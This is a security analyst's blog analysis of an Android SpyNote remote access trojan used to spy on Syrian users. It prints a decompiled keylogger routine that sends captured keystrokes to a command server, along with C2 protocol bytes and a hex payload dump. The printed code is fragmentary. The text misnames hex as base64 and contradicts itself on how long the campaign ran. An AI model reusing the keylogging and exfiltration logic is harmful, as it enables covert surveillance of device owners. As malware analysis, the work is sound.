Neuroróżnorodność w miejscu pracy
15.07.20208 min
Bartłomiej Czyż

Bartłomiej CzyżSenior Cyber Security AnalystRelativity

An in-depth analysis of SpyNote remote access trojan

Find out what a remote access trojan (RAT) is and see how it can affect its victims' devices.

An in-depth analysis of SpyNote remote access trojan

Lookout researchers have recently discovered a surveillance campaign targeting Syrian citizens and it is believed that the actor behind the attack was state-sponsored. The campaign had been active since January 2018 and its goal was to infect Android mobile devices with remote access trojans (RATs) and then spy on people in possession of those devices. 

The victims were tricked into downloading and installing innocent-looking mobile applications which were actually spyware. The applications were shared through various communication channels; however, they were never available on the official Google Play Store. Some applications attempted to masquerade as legitimate ones like Telegram, others were COVID-19 contact tracing apps or benign tools like a fake digital thermometer, and others impersonated Android built-in tools. The common factor was that all of them had an additional functionality: allowing the adversary to spy on the users who installed them.

In this article we will examine the internal workings of one of those applications to analyze its capabilities and understand how it is used by the threat actors.

What is a remote access trojan (RAT)?

A Remote Access Trojan (RAT) is a type of malware that controls a system through a remote network connection. A RAT is typically installed without the victim's knowledge, often as payload of a trojan horse program, and will try to hide its operation from the victim and from security software and other anti-virus software.

A RAT enables its operators to perform many activities on the compromised device (e.g. control a device's camera, access its storage, intercept calls and text messages, etc.). This is all done via an easy-to-use application hosted on a command and control server.

Executive summary 

A sample Android application was chosen for analysis from a pool of 71 malicious ones reported by Lookout’s research. The sample examined is an instance of the SpyNote RAT.

Chosen application details:

After the application is installed, it is displayed as Android with the icon resembling the one of the built-in Android applications Settings.

Malware icon

AndroidManifest.xml file reveals that malware takes advantage of a number of permissions, allowing it to have, among others, the following capabilities:

  • track location of the device (GPS and network-based)
  • make and intercept calls
  • access camera
  • access external storage
  • access contact list
  • read SMS
  • access microphone
  • displaying content over other applications
  • clickjacking via Accessibility Services

Technical details 

While the distribution channel for the application sample remains unknown, it was surely never available on the official Google Play Store. Most likely, the malware was spread via other means like a spearphishing attachment or a link.

A SpyNote client can masquerade as legitimate application. Static code analysis indicates that the malware, after successful installation, would install a legitimate application embedded in the APK file at res/raw/google.apk. Also, screenshots of cracked SpyNote server v6.4.4 proves that functionality:

APK builder

The adversary can pick a name of the application, service, its version, and the name of a victim to be able to differentiate them. This value can be extracted from the res/values/strings.xml file. In this particular example they were set as follows:

<string name="n">Hamody</string> <!-- Victim Name -->
<string name="app_name">Android</string> <!-- App Name -->
<string name="s">Android</string> <!-- Service Name -->
<string name="v">6.4.4</string> <!-- Version -->

This sample did not include any additional applications and the file res/raw/google.apk was empty.

google.apk file details

It was left was so that the malware, when executed, simply loads the legitimate android.settings.ACCESSIBILITY_SETTINGS intent:

Accessibility intent

Code running accessibility intent

Android applications, including malware, can listen for the BOOT_COMPLETED broadcast event to ensure the application will be activated upon device start up, and this is the technique that SpyNote utilizes to achieve its persistence mechanism. As per the AndroidManifest.xml file, the class that is receiving the BOOT_COMPLETED event is

<receiver android:name="" android:enabled="true" android:exported="true">
    <action android:name="android.intent.action.BOOT_COMPLETED"/>

This class waits for the BOOT_COMPLETED broadcast, checks if the service is already running, and, if not, initiates it. The service is responsible for processing commands received from the C2 server and is also the class where most of the code resides. class code

SpyNote is able to discover installed applications, so that the attackers can tell which security appliances are deployed to a device. A reason for collection of the list of applications may be to discover high value applications like banking or messaging software. Application discovery is achieved by using the PackageManager class:

Application discovery code

The above code not only extracts names of the installed applications, but also their installation dates and icons. This is what the operators controlling the device see:

List of extracted applications

There is a large quantity of other data that malware extracts, most likely for the operators to be able to easily tell that it is running in a virtual machine. The following are main information categories that the adversary takes advantage of:

  • device
  • system
  • SIM
  • WiFi
  • audio
  • Bluetooth
  • location

For most Android Virtual Devices (AVDs), the data above will not vary too much by default and it is more than enough information to determine whether the infected system is a real mobile device or an emulator. 

Extracted device information

It can also be seen on the footage that the tool embedded in SpyNote's C2 can be used to generate APKs. It is highly customizable and allows the attacker to choose whether the application should be hidden or not. Other possibilities include enabling key logging, device administration, leveraging SuperSU if the device is rooted, and deactivating icons.

SpyNote APK builder

SpyNote operators can use Device Administrator access to wipe data, lock it, or reset the password:

Device Administrator actions

SpyNote makes use of the accessibility API by overriding onAccessibilityEvent method to log keystrokes. The logs are saved to external storage to file configdd-MM-yyy.log where dd-MM-yyyy is the date of when the keystrokes were captured. The data can then be downloaded by the malware operators.

public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) { 
        try { 
            String a = m1819a(accessibilityEvent); // accessibilityEvent.getText().toString(); 
            String str = (String) accessibilityEvent.getPackageName(); 
            StringBuilder sb = new StringBuilder(); 
            if (a.startsWith("[") && a.endsWith("]")) { 
                a = a.substring(1, a.length() - 1); 
            if (!this.f1163b.equals(a)) { 
                this.f1163b = a; 
                if (str != null && a.length() != 0) { 
                    String format = new SimpleDateFormat("HH:mm a", Locale.ENGLISH).format(new Date()); 
                    String str2 = new String("-1"); 
                    if (getApplicationContext().getResources().getString( == '0') { 
                        // redacted application icon extraction 
                    if (str != null && a != null && format != null) { 
                        if (C11.f1164A) { 
                            C11.m1858a(C11.m1851a(C11.f1181m, 50) + C11.f1175f + C11.m1851a(C11.f1181m, 115) + C11.f1175f + str2 + C11.f1177h + a + C11.f1177h + str + C11.f1177h + format); // send to C&C 
                        sb.append(str2 + C11.f1177h + a + C11.f1177h + str + C11.f1177h + format + C11.f1176g); 
                        String string2 = getApplicationContext().getResources().getString(R.string.s); 
                        if ("mounted".equals(Environment.getExternalStorageState())) { 
                            File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" + string2.trim()); 
                            if (!file.exists()) { 
                            try { 
                                String format = new SimpleDateFormat("dd-MM-yyyy", Locale.ENGLISH).format(new Date()); 
                                String string = getApplicationContext().getResources().getString(R.string.s); 
                                File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" + string.trim()); 
                                if (file.exists()) { 
                                    FileWriter fileWriter = new FileWriter(file.getPath() + "/config" + format + ".log", true); 
                            } catch (IOException unused) { 
        } catch (Exception unused) { 

The spyware has a File Manager feature allowing access to files like application data, pictures, downloads, and others, that are kept in the external storage:

File Manager feature code

File Manager as seen by the attackers

SpyNote has a location tracking feature based on GPS and network data. The location data is obtained by registering LocationListener using requestLocationUpdates method from LocationManager class.

Moreover, a remote command can be issued to capture audio or camera feed. The code is designed to allow live footage to be obtained from all cameras available on a device with additional capabilities like zoom, flash etc.

Audio recording code

The collected data exfiltration is achieved over the command and control channel. All commands and data are sent via the normal communications channel. All traffic sent by a victim's device is compressed before being sent using class:

Data compression code

Command and control (C2, C&C) traffic is sent over an uncommonly used port tcp/215, but it is also possible for SpyNote to communicate via any other TCP port. The IP address and port are chosen during the APK building process:

C2 server configuration

SpyNote uses a custom TCP protocol for C&C communications:

SpyNote protocol visualization

The traffic always starts with the payload size followed by a 0x00 null byte. The payload from a victim to the C2 server is always GZIP DEFLATE-compressed and, thus, starts with 0x1f8b08 bytes.

The above payload was the initial one sent to the C2 and can be easily decompressed:

$ echo "1f8b0800000000000000ad56c9d6ab380e7e957f559b2c98032c0d98314098033b8600614e026178fa22b953dfdb7d4ed7a2744e6c7db29065497684a1384560284eb2ddd4341f0643d1bff2b8795e3f68263f13f553e7ebafaf9faa085b212400965347aa5d000e586047fb0c04842c94def10ce182718e8b46aa0bbd7d0dee0a4a083ea4ecdadc9874f6ead519af886514dcc01fc4952161cc7f4aff27edd6d831fcccfbfeeec9fa475ffd1f6aeae862546f8e790fb2bd066213bf1d8b3eeed9dd0f7cfd866f3f70f50dafbea80a6fae7f63beecfec0b73f3091c91cfac6ebb7efab54563f98f81c6b1913d9af7ef9f78e27d0a380f2bd7794c4e28d5320ebc02b381940e5df08c23fa3dff2c7bdfadd15f3bce71c98d63b263f3d91b43d743c51eef9918c210cfcbef8b1a46aeff1b01f8ac737822bd3167e5ff924938fda3dbf67addb7923d845907d8b87e49713dc6ff67eab87007b6681fe4bf5235f9aa4f1dd37f7f18f9b813d732f2031209ab92790bc5dcea9402241388309f07bb00b30030102e3852400eaef9ae6fef55ffeb1fdefdbfd667b3fe75e187bd5e940e79402f0d08202b4646401e01d4b8e7bebfd4e12982d9907b5c8bf100884748f9eb2dbf3440e1422f7f3ae411e2c1072b652ea1690202ada1c2e2eb355784aad71752ccfbced553a0d6b7d941d26df6d714fee6d8bfbaffb6a896056246e2e5484b1c069d96bc15276c77465dff73fd4141bac70b12c00610345ae85325c95d5ea24aecf60155272c99c91188059d873be9f55b781c0005646c7de376d8eeac45acb66338be53e6bb780b2b733366c2b32993941d00a3eeb4318b220f60d2dc2101a3583b94ae89031724c18b095f20f533ed347f1256ca497a9c276c21214cf8f69ae3f3321cc85bd5ac0a97e9227c9463123087de34493a7e06570db40900b7a509843b09e2ed3edb80a5485986888dfd8d6f3f4d21c05cfa38e5147b5dd829346ff227b87672d73d8904a8faf2a45eb8ae76b87a27132944612c764a54ee64408a62400e1643e91fb84a96d8cf40d7be88fd801794d1bee2457896fdd8aac653db3518677d7d54479975ec5184dbbd3fdcc4e25b36d78e824dbd32e6129a78ece1c59c79cb22bdd3cc35ae9a9fc7eb936c8f06aca9bc2481ee755843c6648174fcba28b2c8dcd16393f8ee2f388ad673d7d558f36e3dc583fad04567a536aabf7749db743b1aa1ce37ab495e744fc4ac9d86a8959f60e9b3680cdbc26519e65316d8b5724c6326501c10a0bff71e8058af2b66dc51d2a337d553e3aebb5efa3ecd40cc0412a91b4aeb28d2ac0a9cdf9e9040d23bd9ee43d269f6332b2a41b9400bbc788d9313ec3961a46d3366c1bad8e3ad199aec154a2a8ec2ef8bdbbcafbb605a78ca9ddbb83c259c703e39ce5609acfd773c285500813a7a0287340190da3aec11648faf37ce23dcd3fd1ce991ab0f16651aec18d0e190ec7a8c1f157ec5e9a1be9f7c4eaea6423bd5e11e2ce2a8a1dd3837f7ad5e5c3c6a8146973f93c0d18de23f1018f373f6e06f72e2cdcc5ea1e847009f3514e6cc05b27c77069f27c5e18c3488f349c3a74beb9f18077484e2d96fe9054c6196dc1d9dfe9476b7108866fd985b1dc27f6228386165ee730b4a3977f500ff186b794433ca2162a65c09209c00623bc04a175d2137da9029451f01b702a7f620d37c573e8114f2257d45e37199118bdd102c26100f7657f3b957b5ade8dd7993de54abdecf557d5fccdb646bfe679ad8882ac893ca85bb6c3f781a16bda4db50d9ae1f6bd0d3daa7a9657c5780fe42cc6cf3b32de7bf0707558907663caf31e40a85afd3adce27ed1a90464bcc15260ef587c9c4eb705c6fe7ef9c1e5ec4d42e35b5e6d929a9751500bdcc1c93cdbce30135875b2cc87869ae8fcb42c97e42567e3a3eb8496df2ca20389afc0c0ef34dc7398b450051d99793c5e9697760eb950093af446c9eaa02f0feff67cb4c5d06df421b838fd2a41849aa5a8c9c472998a289c6f1a1498fd0523435b6bf8810c2ffc253dd1817e3f06041e3b2d68cf56c3dde6a6b29f91bdffd7b5860fb4ba0606bcf3ca094af0a4a48f21d4563bb00f8c47f3255f05e9113cb1557b8c3d55056d2aa86570f41a4594430d5a93d491ed93f3ba444bd022091653f2efd955b13bf43c46872018f5a56573c7ba4d5b89b43e1d487465aa2e7764af50acc9b984b9a85fe4c69594529517a755d4052e61ea600b7ec5521b5624fde21f67a5383d43f2a04338f8fcecbb8a12d64d2ed0395fc1870ebd44399f64690b4bd5bbddb58b7fbfa7425c3f474d1ab532759eb3a87521319981c7a1e9b9c4c347e083ab4f71ca95e430375b5518c21bfb20f42335dcac5a2c16deeb2242ce367d30ed68d67324fa34a572dcf6d9fa61a5be2f9aeb17e8b2477fcbbe1c41fb4aa65b337ee5fde36b618edffbddbda5c5d90f9f1f518a6512ea48253841a5d97785ef03f36e7cff06af257e1b320b0000" | xxd -r -p | zcat

The above base64 string is an encoded JPG file containing a part of the device's screen:

Extracted part of the device screen

After the initial payload is sent to the C2 server, the beaconing activity between the device and the C&C server begins:

Beaconing traffic

The server sends 35 00 70 6f 69 6e 67 which is similar to the described protocol above:

  • 0x35 - payload size (5 ASCII)
  • 0x00 - null byte
  • 0x706f696e67 - poing in ASCII

The victim responds with:


  • 0x3333 - payload size (33 ASCII)
  • 0x00 - null byte
  • 0x1f8b08000000000000002b28cd2d30343032b1c82bcdc901007d342eed0d000000 - GZIP compressed string pump10248null


Analysis of the SpyNote sample indicates that the threat actors behind the surveillance campaign had extensive control over victims' devices. Not only does this piece of malware have considerable features, but it is also highly customizable to evade detection and deceive victims into downloading, installing, and providing full access to their devices. Having that in mind, it should not be surprising that the adversary was able to run the campaign for over a dozen years. It is also clear that users should be educated not to install mobile applications from non-official application stores. Moreover, Device Administrator privilege should only be granted to, if any, trusted applications.


Indicators of compromise (IOCs)

MITRE ATT&CK Techniques